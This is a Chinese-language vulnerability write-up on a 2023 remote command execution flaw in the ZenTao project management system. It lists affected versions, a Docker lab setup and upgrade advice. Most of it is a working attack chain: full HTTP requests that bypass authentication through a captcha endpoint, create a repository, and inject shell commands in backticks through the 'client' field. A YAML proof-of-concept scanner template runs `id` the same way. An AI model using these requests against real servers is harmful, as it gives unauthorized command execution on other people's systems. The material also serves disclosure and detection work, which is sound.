0x01漏洞描述
禅道是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可通过权限绕过在服务器执行任意命令。
0x02影响范围
开源版:
17.4以下的未知版本<=version<=18.0.beta1
旗舰版:
3.4以下的未知版本<=version<=4.0.beta1
企业版:
7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
0x03环境搭建
1、自己动手
官网下载
搜索18.0.beta1
点开然后直接拉到最下面
选择linux一键安装版本(windows经测试发现复现有问题)
下载后根据安装文档安装即可
2、docker
一句话直接搞定
docker pull easysoft/zentao:18.0.beta1
docker run --name zentao -d -p 8090:80 easysoft/zentao:18.0.beta1
启动
直接访问http://ip:8090/ ,进行安装
数据库密码默认为123456
成功安装
查看源码版本号18.0.beta1
0x04漏洞复现
1、激活cookie
在首页抓包
然后修改路径,以及cookie(格式一样就行)
路径:/misc-captcha-user.html
Cookie: Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
返回200 页面正常基本都是存在
2、创建代码库
路径:/repo-create.html
数据包:
POST /repo-create.html HTTP/1.1
Host: your-ip
Content-Length: 113
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://your-ip
Referer: http://your-ip/zentao/repo-edit-1-0.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:zentaosid=984f74a56cc7ef44625511101014965c; lang=zh-cn; device=desktop; theme=default; tab=my; repoBranch=master; windowWidth=1187; windowHeight=658
Connection: close
product%5B%5D=22222&SCM=Gitlab&name=22222&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=aaa看到sucess 即为成功。
3、执行命令
路径:/repo-edit-10000-10000.html
poc:
POST /repo-edit-10000-10000.html HTTP/1.1
Host: your-ip
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://your-ip
Referer: http://your-ip/repo-edit-1-0.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:zentaosid=984f74a56cc7ef44625511101014965c; lang=zh-cn; device=desktop; theme=default; tab=my; repoBranch=master; windowWidth=1187; windowHeight=658
Connection: close
SCM=Subversion&client=`执行的命令` 成功执行
0x05 poc检测
params: []
name: 禅道项目管理软件命令注入漏洞
set:
referer: request.url
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
r3: randomInt(100, 100000)
rules:
- method: GET
path: /misc-captcha-user.html
headers:
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
body: ""
search: ""
followredirects: false
expression: response.status == 200
- method: POST
path: /repo-create.html
headers:
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Referer: '{{referer}}/repo-edit-1-0.html'
X-Requested-With: XMLHttpRequest
body: product%5B%5D={{r3}}&SCM=Gitlab&name={{r3}}&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes("success"))
- method: POST
path: /repo-edit-10000-10000.html
headers:
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Referer: '{{referer}}/repo-edit-1-0.html'
X-Requested-With: XMLHttpRequest
body: SCM=Subversion&client=`id`
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes("uid"))
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
0x06 修复建议
开源版升级至 18.0.beta2 及以上版本;
企业版升级至 8.0.bate2 及以上版本;
旗舰版升级至 4.0.bate2 及以上版本;
请登录后查看回复内容